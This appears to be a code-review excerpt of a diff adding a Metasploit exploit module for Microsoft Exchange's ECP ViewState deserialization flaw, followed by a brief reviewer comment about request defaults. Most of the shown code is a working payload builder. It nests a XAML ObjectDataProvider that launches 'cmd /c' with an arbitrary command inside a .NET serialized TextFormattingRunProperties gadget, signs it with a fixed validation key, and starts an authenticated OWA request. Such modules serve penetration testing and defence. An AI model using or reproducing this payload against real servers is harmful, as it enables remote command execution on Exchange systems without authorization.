modules/exploits/windows/http/exchange_ecp_viewstate.rb

```diff
@@ -0,0 +1,365 @@
+
+  def generate_viewstate(generator, session_id, cmd)
+    # LosFormatted
+    resource_dictionary  = "<ResourceDictionary "
+    resource_dictionary <<   "xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/presentation\" "
+    resource_dictionary <<   "xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" "
+    resource_dictionary <<   "xmlns:System=\"clr-namespace:System;assembly=mscorlib\" "
+    resource_dictionary <<   "xmlns:Diag=\"clr-namespace:System.Diagnostics;assembly=system\">"
+    resource_dictionary <<     "<ObjectDataProvider x:Key=\"\" ObjectType=\"{x:Type Diag:Process}\" MethodName=\"Start\">"
+    resource_dictionary <<       "<ObjectDataProvider.MethodParameters>"
+    resource_dictionary <<         "<System:String>cmd</System:String>"
+    resource_dictionary <<         "<System:String>/c #{cmd.encode(:xml => :text)}</System:String>"
+    resource_dictionary <<       "</ObjectDataProvider.MethodParameters>"
+    resource_dictionary <<     "</ObjectDataProvider>"
+    resource_dictionary << "</ResourceDictionary>"
+
+    library = BinaryLibrary.new(
+      library_id: 2,
+      library_name: "Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"
+    )
+
+    serialized  = "\x00\x01\x00\x00"
+    serialized << SerializationHeaderRecord.new(header_id: -1).to_binary_s
+    serialized << library.to_binary_s
+    serialized << ClassWithMembersAndTypes.new(
+      class_info: ClassInfo.new(
+        obj_id: 1,
+        name: 'Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties',
+        member_names: ['ForegroundBrush']
+      ),
+      member_type_info: MemberTypeInfo.new(
+        binary_type_enums: [BinaryTypeEnum[:String]]
+      ),
+      library_id: library.library_id
+    ).to_binary_s
+    serialized << BinaryObjectString.new(
+      obj_id: 3,
+      string: resource_dictionary
+    ).to_binary_s
+    serialized << "\x0b"
+
+    # token: Token_BinarySerialized
+    formatted  = ObjectStateFormatter.new(token: 50).to_binary_s
+    formatted << encode_7bit_int(serialized.length)
+    formatted << serialized
+
+    mac_key_bytes  = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')
+    mac_key_bytes << Rex::Text.to_unicode(session_id)
+
+    signature = OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, formatted + mac_key_bytes)
+    return Rex::Text.encode_base64(formatted + signature)
+  end
+
+  def exploit
+    # need to use a newer default user-agent than what Metasploit currently provides
+    # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string
+    user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'
+    res = send_request_cgi({
+        'uri'           => normalize_uri(target_uri.path, 'owa', 'auth.owa'),
+        'method'        => 'POST',
+        'content-type'  => 'application/x-www-form-urlencoded',
```

Comment:
This should already be the default for `send_request_cgi`, but it's fine to be specific.